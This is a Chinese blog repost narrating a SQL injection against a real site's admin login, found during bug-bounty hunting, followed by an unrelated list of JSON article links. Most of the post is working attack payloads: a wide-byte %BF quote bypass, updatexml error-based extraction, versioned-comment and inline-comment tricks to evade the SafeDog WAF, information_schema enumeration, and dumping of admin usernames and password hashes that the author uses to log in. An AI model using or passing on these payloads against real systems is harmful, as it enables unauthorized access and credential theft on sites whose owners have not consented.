百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程字典 > 正文

记一次艰难的SQL注入(过安全狗)(sql注入安全防范措施)

toyiye 2024-07-15 01:34 7 浏览 0 评论

零基础学黑客领资料 搜公众号:白帽子左一

前言

最近在挖补天的src,然后挖出了不少SQL注入,完了出了数据库名就不管那么多提交了。今天挖了个报错注入的,突然一激灵,说我不能这样颓废下去了,刚好是个后台登录的界面,我决心要登进它的后台。


2.1 注入测试


bp抓包,加单引号,没有什么用

很显然,这里开启了php的魔术函数,把单引号自动转义了


2.1.1 绕过第一式:汉字双字节编码绕过单引号


当开启了魔术函数过滤了引号时,可以在引号前加上一个汉字双字节编码,可以实现绕过


例如构造Payload为:


username=%BF'


%BF解码之后是中文乱码


此时发送数据包



可以看到SQL语句变成:


SELECT * FROM `sl_admin` WHERE `username`='?''


成功过滤单引号


程序报错,考虑使用爆错注入


3.1 获取数据库

既然想进后台,就需要账号密码,就要注数据库,表名,列名,内容


第一步是注出数据库,版本,用户等基本信息


先把Payload放出来,再进行讲解


Payload:


username=%BF'/**/and/**/updatexml(1,concat(0x7e,(database()),0x7e),1)#


数据库名不能放出来,在本文中用test_db代替


用这个Payload成功注出了数据库,因而版本信息,当前用户只是改一个值的事,在这里也放出来


数据库:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(database()),0x7e),1)#
用户:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(user()),0x7e),1)#
版本:
username=%BF'/**/and/**/updatexml(1,concat(0x7e,(version()),0x7e),1)#


3.1.1 绕过第二式:注释

再第一个绕过那里,可以看到SQL语句后面还多了个单引号。这个单引号要么把它闭合,要么就注释掉。由于这里开启了魔术函数,所以选择注释。


我原本是想用 –+ 来注释的,但是网站用了安全狗,所以加号被干掉了,那就只能用 # 注释了。


注释成功,很简单,没什么好说的


3.1.2 绕过第三式:内联注释绕过空格

安全狗把空格干掉了


空格或者加号都会被干掉


当空格和加号都被干掉时,可以用内联注释 /**/ 代替实现绕过


username=%BF/**/and/**/1'


4.1 获取表名

再得到数据库后要获取表名


先把Payload放出来


username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),0x7e),1)#

管理员表用admin代替,其他表用test_table代替


4.1.1 绕过第四式:select过安全狗

注表名需要用select语句,因此我最开始写的Payload是这样的:

username=%BF'/**/and/**/updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),0x7e),1)#


很快啊,被安全狗拦了


这种select的绕过是最麻烦的,我在尝试了URL编码绕过,混淆大小写绕过,脏数据绕过均告失败后,打开了万能的百度,看到了这篇文章


https://www.cnblogs.com/w-i-n-d/p/8649590.html


在该文中,用 /*!50000%53elect*/ 代替select实现绕过


我尝试了一下,成功实现了绕过(见上图)


后来我测试了一下,其他关键词也可以用这种方法绕过


select
/*!50000%53elect*/




order 
 /*!50000%6frder*/




union
/*!50000%75nion*/



5.1 获取列名

得到了表名和列名,接下来就是要获取列名


先放Payload:


username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/limit/**/7,1),0x7e),1)#


5.1.1 绕过第五式:骚操作绕过魔术函数

按照正常的注入流程,写出来的Payload应该是这样的:


username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/and/**/table_name/**/like/**/'admin'),0x7e),1)#


问题在于,魔术函数干掉了我的单引号


于是我就开始各种百度,Google,查找怎么绕过魔术函数


Noway


就在陷入死胡同时,我灵机一动


我在最开始学SQL注入的时候,看到information_schema数据库获取信息时,专门去看了这个数据库的结构,在columns这个表里有个字段叫 column_name ,是攻击者需要获取的信息,有个字段叫 table_schema ,对应的是该字段所在的数据库名,有个字段叫 table_name ,对应的是该字段所在的表名


因此,当同时获取了数据库名和表名时,可以获取到对应表的所有列名。


但是在表数量少且无法利用表名时,可以只指定数据库名,然后利用 limit 语句获取当前数据库所有的字段,再通过经验判断表名


例如,我想知道 数据库 test中admin表的内容


select column_name from information_schema.columns where table_schema like 'test';


这时通过直觉可以判断出,admin表中的字段是 id username password


同理,在该站点中,可以通过这种方法,获取字段


当Payload指定为:


username=%BF'/**/and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/limit/**/1,1),0x7e),1)#


得到的字段数为:typeid

通过修改limit后的值,就可以得到所有的字段,包括admin表中的字段


经过测试,当值为 7,1 时可以得到字段 username ;当值为 8,1 时可以得到字段 password


6.1 爆帐密

得到了以上信息后,爆帐密就很简单了


爆账号:username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/username/**/from/**/sl_admin),0x7e),1)#
爆密码:
username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/substr(password,1,31)/**/from/**/sl_admin),0x7e),1)#
username=%BF'+and/**/updatexml(1,concat(0x7e,(/*!50000%53elect*//**/substr(password,32,31)/**/from/**/sl_admin),0x7e),1)#



因为密码长度为32,而这里最多只能显示31为,因此用substr函数分两次爆出


解密得到账号密码


登录成功


总结

实战注入的难度比靶场大得多,各种绕过,各种骚操作。


要学会利用搜索工具,更要学会选择性放弃


当一条路走不通就换另一种方法,也许就会柳暗花明又一村

————————————————

版权声明:本文为CSDN博主「漫路在线」

原文链接:https://blog.csdn.net/realmels/article/details/122766147



相关推荐

为何越来越多的编程语言使用JSON(为什么编程)

JSON是JavascriptObjectNotation的缩写,意思是Javascript对象表示法,是一种易于人类阅读和对编程友好的文本数据传递方法,是JavaScript语言规范定义的一个子...

何时在数据库中使用 JSON(数据库用json格式存储)

在本文中,您将了解何时应考虑将JSON数据类型添加到表中以及何时应避免使用它们。每天?分享?最新?软件?开发?,Devops,敏捷?,测试?以及?项目?管理?最新?,最热门?的?文章?,每天?花?...

MySQL 从零开始:05 数据类型(mysql数据类型有哪些,并举例)

前面的讲解中已经接触到了表的创建,表的创建是对字段的声明,比如:上述语句声明了字段的名称、类型、所占空间、默认值和是否可以为空等信息。其中的int、varchar、char和decimal都...

JSON对象花样进阶(json格式对象)

一、引言在现代Web开发中,JSON(JavaScriptObjectNotation)已经成为数据交换的标准格式。无论是从前端向后端发送数据,还是从后端接收数据,JSON都是不可或缺的一部分。...

深入理解 JSON 和 Form-data(json和formdata提交区别)

在讨论现代网络开发与API设计的语境下,理解客户端和服务器间如何有效且可靠地交换数据变得尤为关键。这里,特别值得关注的是两种主流数据格式:...

JSON 语法(json 语法 priority)

JSON语法是JavaScript语法的子集。JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔花括号保存对象方括号保存数组JS...

JSON语法详解(json的语法规则)

JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔大括号保存对象中括号保存数组注意:json的key是字符串,且必须是双引号,不能是单引号...

MySQL JSON数据类型操作(mysql的json)

概述mysql自5.7.8版本开始,就支持了json结构的数据存储和查询,这表明了mysql也在不断的学习和增加nosql数据库的有点。但mysql毕竟是关系型数据库,在处理json这种非结构化的数据...

JSON的数据模式(json数据格式示例)

像XML模式一样,JSON数据格式也有Schema,这是一个基于JSON格式的规范。JSON模式也以JSON格式编写。它用于验证JSON数据。JSON模式示例以下代码显示了基本的JSON模式。{"...

前端学习——JSON格式详解(后端json格式)

JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScriptProgrammingLa...

什么是 JSON:详解 JSON 及其优势(什么叫json)

现在程序员还有谁不知道JSON吗?无论对于前端还是后端,JSON都是一种常见的数据格式。那么JSON到底是什么呢?JSON的定义...

PostgreSQL JSON 类型:处理结构化数据

PostgreSQL提供JSON类型,以存储结构化数据。JSON是一种开放的数据格式,可用于存储各种类型的值。什么是JSON类型?JSON类型表示JSON(JavaScriptO...

JavaScript:JSON、三种包装类(javascript 包)

JOSN:我们希望可以将一个对象在不同的语言中进行传递,以达到通信的目的,最佳方式就是将一个对象转换为字符串的形式JSON(JavaScriptObjectNotation)-JS的对象表示法...

Python数据分析 只要1分钟 教你玩转JSON 全程干货

Json简介:Json,全名JavaScriptObjectNotation,JSON(JavaScriptObjectNotation(记号、标记))是一种轻量级的数据交换格式。它基于J...

比较一下JSON与XML两种数据格式?(json和xml哪个好)

JSON(JavaScriptObjectNotation)和XML(eXtensibleMarkupLanguage)是在日常开发中比较常用的两种数据格式,它们主要的作用就是用来进行数据的传...

取消回复欢迎 发表评论:

请填写验证码